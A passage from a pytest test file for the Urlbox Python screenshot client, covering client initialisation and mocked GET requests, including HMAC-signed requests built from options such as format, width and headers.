It is method for GET /ays/repository/{repository}/template
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/template"
return self.client._get(uri, headers, query_params, content_type)
def deleteRepository(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Delete a repository
It is method for DELETE /ays/repository/{repository}
"""
uri = self.client._base_url + "/ays/repository/"+repository
return self.client._delete(uri, headers, query_params, content_type)
def getRepository(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get information of a repository
It is method for GET /ays/repository/{repository}
"""
uri = self.client._base_url + "/ays/repository/"+repository
return self.client._get(uri, headers, query_params, content_type)
def listRepositories(self, headers=None, query_params=None, content_type="application/json"):
"""
list all repositories
It is method for GET /ays/repository
"""
uri = self.client._base_url + "/ays/repository"
return self.client._get(uri, headers, query_params, content_type)
def createRepository(self, data, headers=None, query_params=None, content_type="application/json"):
"""
create a new repository
It is method for POST /ays/repository
"""
uri = self.client._base_url + "/ays/repository"
return self.client._post(uri, data, headers, query_params, content_type)
def addTemplateRepo(self, data, headers=None, query_params=None, content_type="application/json"):
"""
add a new actor template repository
It is method for POST /ays/template_repo
"""
uri = self.client._base_url + "/ays/template_repo"
return self.client._post(uri, data, headers, query_params, content_type)
def getAYSTemplate(self, name, headers=None, query_params=None, content_type="application/json"):
"""
get an AYS template
It is method for GET /ays/templates/{name}
"""
uri = self.client._base_url + "/ays/templates/"+name
return self.client._get(uri, headers, query_params, content_type)
def listAYSTemplates(self, headers=None, query_params=None, content_type="application/json"):
"""
list all AYS templates
It is method for GET /ays/templates
"""
uri = self.client._base_url + "/ays/templates"
return self.client._get(uri, headers, query_params, content_type)
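# --- Editor's note: illustrative usage sketch, not part of the original generated client. ---
# The parent client that supplies _base_url/_get/_post lives elsewhere in the repo; the
# requests-based stand-in below is a hypothetical stub so the sketch is self-contained.
# The base URL, repository name, filter values and callback URL are all made up.
if __name__ == "__main__":
    import requests

    class _StubHttpClient(object):
        """Hypothetical stand-in for the generated parent HTTP client."""
        def __init__(self, base_url):
            self._base_url = base_url
        def _get(self, uri, headers=None, query_params=None, content_type="application/json"):
            return requests.get(uri, headers=headers, params=query_params)
        def _post(self, uri, data, headers=None, query_params=None, content_type="application/json"):
            return requests.post(uri, data=data, headers=headers, params=query_params)

    ays = AysService(_StubHttpClient("http://localhost:5000"))
    # listJobs: the filters documented in its docstring are plain query parameters.
    jobs = ays.listJobs("my-repo", query_params={"actor": "node", "action": "install"})
    # createRun is asynchronous: the server POSTs the final status to the callback url,
    # and the returned run key can also be polled with getRun (body schema assumed).
    run = ays.createRun('{"callback_url": "http://callback.example/run-done"}', "my-repo")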
| 45.110778
| 170
| 0.670671
| 1,847
| 15,067
| 5.331348
| 0.094748
| 0.073119
| 0.137808
| 0.078196
| 0.83853
| 0.828476
| 0.807556
| 0.784097
| 0.766325
| 0.692597
| 0
| 0.000084
| 0.21411
| 15,067
| 333
| 171
| 45.246246
| 0.831518
| 0.261764
| 0
| 0.486486
| 0
| 0
| 0.138226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.324324
| false
| 0
| 0.009009
| 0
| 0.657658
| 0.144144
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
3f3d6f8f5bddab26e7bb0f9e36ac3508487d95e9
| 9,613
|
py
|
Python
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 2
|
2017-07-31T11:45:46.000Z
|
2017-08-09T09:32:35.000Z
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 28
|
2016-11-17T11:12:32.000Z
|
2018-11-02T14:09:13.000Z
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 4
|
2017-02-12T17:47:21.000Z
|
2018-05-29T08:16:27.000Z
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from tool.tb_filter import tbFilterTool
@pytest.mark.hic
def test_tb_filter_frag_01():
"""
Test case to ensure that the TADbit filter works with frag mapping.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_frag_02():
"""
Test case to ensure that the TADbit filter works with frag mapping and conservative filtering.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_01():
"""
Test case to ensure that the TADbit filter works with iterative mapping.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_02():
"""
Test case to ensure that the TADbit filter works with iterative mapping and conservative filtering.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
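# --- Editor's note: illustrative sketch, not part of the original test module. ---
# The four tests above repeat the same isfile/getsize checks over the same output
# suffixes; one possible refactor (the helper name is the editor's, not the repo's)
# is to drive the assertions from a single suffix list:
def _check_filter_outputs(reads_tsv):
    """Assert that every expected filter output file exists and is non-empty."""
    suffixes = [
        '_dangling-end.tsv', '_duplicated.tsv', '_error.tsv',
        '_extra_dangling-end.tsv', '_over-represented.tsv', '_random_breaks.tsv',
        '_self-circle.tsv', '_too_close_from_RES.tsv', '_too_short.tsv',
    ]
    for suffix in suffixes:
        assert os.path.isfile(reads_tsv + suffix) is True
        assert os.path.getsize(reads_tsv + suffix) > 0
    # '_too_large.tsv' is only checked for existence above; its size check is
    # commented out in the original tests, so it is left out here as well.
    assert os.path.isfile(reads_tsv + '_too_large.tsv') is True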
| 46.665049
| 97
| 0.696453
| 1,430
| 9,613
| 4.427273
| 0.099301
| 0.091929
| 0.166798
| 0.125099
| 0.906334
| 0.906334
| 0.906334
| 0.906334
| 0.899384
| 0.874112
| 0
| 0.024568
| 0.170082
| 9,613
| 205
| 98
| 46.892683
| 0.76899
| 0.125975
| 0
| 0.808219
| 0
| 0
| 0.280053
| 0.138345
| 0
| 0
| 0
| 0
| 0.575342
| 1
| 0.027397
| false
| 0
| 0.027397
| 0
| 0.054795
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3f6b516f9834601b876a15a850ca889355b27cd6
| 14,468
|
py
|
Python
|
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_eureka/flask_rest_test.py
|
estuaryoss/estuary-discovery
|
9615a9d544670570f14f4c72ca20f57a0cd9bba4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import time
import unittest
import requests
from py_eureka_client import eureka_client
from requests_toolbelt.utils import dump
from rest.api.constants.api_constants import ApiCode
from rest.api.responsehelpers.error_codes import ErrorMessage
class EstuaryStackApps:
@staticmethod
def get_supported_apps():
return ["estuary-agent", "estuary-discovery"]
class EurekaClient:
def __init__(self, host):
self.host = host
def get_apps(self):
apps_list = []
print("Getting apps from eureka server {} ... \n".format(self.host))
for app in eureka_client.get_applications(eureka_server=self.host).applications:
for instance in app.up_instances:
# print(instance.app)
apps_list.append(instance.hostName)
return apps_list
class FlaskServerEurekaTestCase(unittest.TestCase):
discovery_ip = "estuary-discovery"
home_url_int = f"http://{discovery_ip}"
home_url = "http://localhost"
agent_ip = "estuary-agent-java"
server_port_ext = "8081"
server_port = "8080" # all have 8080
no_of_agents = 1
no_of_discovery = 1
username = "admin"
password = "estuaryoss123!"
def test_eureka_registration(self):
up_services = EurekaClient("http://localhost:8080/eureka/v2").get_apps()
self.assertEqual(len(up_services), 2)
def test_get_eureka_apps(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), 2)
self.assertEqual(len(body.get('description').get(self.discovery_ip)), self.no_of_discovery)
self.assertEqual(len(body.get('description').get(self.agent_ip)), self.no_of_agents)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("ipAddr"), self.discovery_ip)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("port"), self.server_port)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("app"), self.discovery_ip)
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("homePageUrl"),
f"{self.home_url_int}:{self.server_port}/")
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("statusPageUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description').get(self.discovery_ip)[0].get("healthCheckUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description').get(self.agent_ip)[0].get("port"), self.server_port)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_agent(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/estuary-agent", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), self.no_of_agents)
self.assertGreaterEqual(len(body.get('description')[0]), 8)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_discovery(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/discovery", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), self.no_of_discovery)
self.assertGreaterEqual(len(body.get('description')[0]), 8)
self.assertEqual(body.get('description')[0].get("ipAddr"), self.discovery_ip)
self.assertEqual(body.get('description')[0].get("port"), self.server_port)
self.assertEqual(body.get('description')[0].get("app"), self.discovery_ip)
self.assertEqual(body.get('description')[0].get("homePageUrl"),
f"{self.home_url_int}:{self.server_port}/")
self.assertEqual(body.get('description')[0].get("healthCheckUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('description')[0].get("statusPageUrl"),
f"{self.home_url_int}:{self.server_port}/ping")
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_eureka_apps_empty_list(self):
app = "whatever"
headers = {}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/{app}", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 0)
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_finished_commands(self):
headers = {"Content-Type": "application/json"}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/commands/finished", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
# self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(len(body.get('description')), 1)
self.assertIsNotNone(body.get('description')[0].get("ip_port"))
self.assertIsNotNone(body.get('description')[0].get("homePageUrl"))
self.assertIsInstance(body.get('description')[0].get('description'), list)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_commands_unauthorized(self):
headers = {}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/commands", headers=headers,
auth=(self.username, "invalidPasswd"))
headers = response.headers
self.assertEqual(response.status_code, 401)
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_time_of_x_requests(self):
repetitions = 5
start = time.time()
headers = {}
for _ in range(1, repetitions):
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps", headers=headers,
auth=(self.username, self.password))
self.assertEqual(response.status_code, 200)
end = time.time()
print(f"made {repetitions} get eureka apps repetitions in {end - start} s")
def test_get_agents_file_missing_file_path_n(self):
headers = {
"Content-Type": "application/json",
'whatever': '100'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertIn("Exception",
body.get('description')[0].get('description'))
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_get_agents_file_p(self):
headers = {
'File-Path': '/etc/hostname'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertGreater(len(body.get('description')[0]), 8)
def test_get_agents_file_file_not_found(self):
expected = "Exception"
headers = {
'File-Path': '/dummy_path'
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/agents/file/read", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIn(expected, body.get('description')[0].get('description'))
def test_agent_command_start_broadcast_p(self):
cmd = "echo 1"
headers = {
"Content-Type": "application/json"
}
response = requests.post(f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertIsInstance(body.get('description'), list)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_unicast_p(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
# print(dump.dump_response(response))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast command
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'IpAddr-Port': '{}:{}'.format(item.get('ipAddr'), item.get('port')),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands", data=cmd, headers=headers,
auth=(self.username, self.password))
body = response.json()
print(dump.dump_response(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_start_unicast_by_home_page_url(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
# print(dump.dump_response(response))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast command start request and check the results
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'HomePageUrl': item.get('homePageUrl'),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
print(dump.dump_response(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
self.assertIsInstance(body.get('description')[0].get('description').get('commands').get(cmd), dict)
def test_agent_command_start_unicast_wrong_ip_port(self):
cmd = "echo 1"
# get eureka apps agent
headers = {
"Content-Type": "application/json"
}
response = requests.get(f"{self.home_url}:{self.server_port_ext}/eureka/apps/agent", headers=headers,
auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 1)
# send unicast command
agent_apps = body.get('description')
for i, item in enumerate(agent_apps):
headers = {
'IpAddr-Port': '{}:{}'.format(item.get('ipAddr') + "invalidThing", item.get('port')),
"Content-Type": "application/json"
}
# send unicast message to the agents with the ip:port
response = requests.post(
f"{self.home_url}:{self.server_port_ext}/agents/commands",
data=cmd, headers=headers, auth=(self.username, self.password))
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body.get('description')), 0)
if __name__ == '__main__':
unittest.main()
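# --- Editor's note: illustrative sketch, not part of the original test module. ---
# The tests above drive /agents/commands in two modes: broadcast (no routing header)
# and unicast (an 'IpAddr-Port' or 'HomePageUrl' header taken from the eureka entry).
# The helper below just restates that pattern; the default host, port and credentials
# mirror the class constants above and are placeholders.
def _send_command_example(cmd="echo 1", base_url="http://localhost:8081",
                          auth=("admin", "estuaryoss123!"), ip_addr_port=None):
    """Send a command broadcast (default) or unicast when ip_addr_port is given."""
    headers = {"Content-Type": "application/json"}
    if ip_addr_port is not None:
        headers["IpAddr-Port"] = ip_addr_port  # e.g. "estuary-agent-java:8080"
    return requests.post(f"{base_url}/agents/commands", data=cmd,
                         headers=headers, auth=auth)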
| 46.5209
| 117
| 0.623721
| 1,663
| 14,468
| 5.279014
| 0.101624
| 0.051031
| 0.088165
| 0.070167
| 0.820595
| 0.792004
| 0.772298
| 0.755781
| 0.739378
| 0.739378
| 0
| 0.011239
| 0.237421
| 14,468
| 310
| 118
| 46.670968
| 0.784465
| 0.051769
| 0
| 0.550201
| 0
| 0
| 0.205328
| 0.087299
| 0
| 0
| 0
| 0
| 0.301205
| 1
| 0.072289
| false
| 0.072289
| 0.028112
| 0.004016
| 0.160643
| 0.016064
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3f6c7bd9dac49bb2e0aaa51aab7049d26d2f2c36
| 21,646
|
py
|
Python
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | 2
|
2021-11-26T14:28:29.000Z
|
2021-11-26T17:22:39.000Z
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | 10
|
2021-11-26T16:54:34.000Z
|
2021-12-08T19:15:44.000Z
|
tests/test_urlbox_client.py
|
urlbox/urlbox-python
|
8d4541cbe0310002b9bdb70ee8de4cb051f8815d
|
[
"MIT"
] | null | null | null |
from faker import Faker
from hashlib import sha1
from urlbox import InvalidUrlException, UrlboxClient
import json
import hmac
import pytest
import random
import requests
import requests_mock
import urllib.parse
import warnings
fake = Faker()
# test_init()
def test_only_api_key_provided():
api_key = fake.pystr()
urlbox_client = UrlboxClient(api_key=api_key)
assert urlbox_client.api_key == api_key
def test_both_api_key_and_api_secret_provided():
api_key = fake.pystr()
api_secret = fake.pystr()
urlbox_client = UrlboxClient(api_key=api_key, api_secret=api_secret)
assert (
urlbox_client.api_key == api_key
and urlbox_client.api_secret == api_secret
)
def test_api_key_not_provided():
with pytest.raises(TypeError) as type_error:
UrlboxClient()
assert (
str(type_error.value)
== "__init__() missing 1 required keyword-only argument: 'api_key'"
)
# Test get()
# valid api key
# valid url, format and options
def test_get_successful():
api_key = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
}
urlbox_request_url = (
f"{UrlboxClient.BASE_API_URL}"
f"{api_key}/{format}"
f"?{urllib.parse.urlencode(options, doseq=True)}"
)
urlbox_client = UrlboxClient(api_key=api_key)
with requests_mock.Mocker() as requests_mocker:
with open(
"tests/files/urlbox_screenshot.png", "rb"
) as urlbox_screenshot:
requests_mocker.get(
urlbox_request_url,
content=urlbox_screenshot.read(),
headers={"content-type": f"image/{format}"},
)
response = urlbox_client.get(options)
assert response.status_code == 200
assert format in response.headers["Content-Type"]
assert isinstance(response, requests.models.Response)
assert isinstance(response.content, bytes)
def test_get_successful_authenticated():
api_key = fake.pystr()
api_secret = fake.pystr()
format = random.choice(
["png", "jpg", "jpeg", "avif", "webp", "pdf", "svg", "html"]
)
url = fake.url()
options = {
"url": url,
"format": format,
"full_page": random.choice([True, False]),
"width": fake.random_int(),
"header": ["header1=value1", "header2=value2"],
}
url_encoded_options = urllib.parse.urlencode(options, doseq=True)
token = (
hmac.new(
str.encode(api_secret), str.encode(url_encoded_options), sha1,
)
.hexdigest()
.rstrip("\n")
)
urlbox_request_url = (
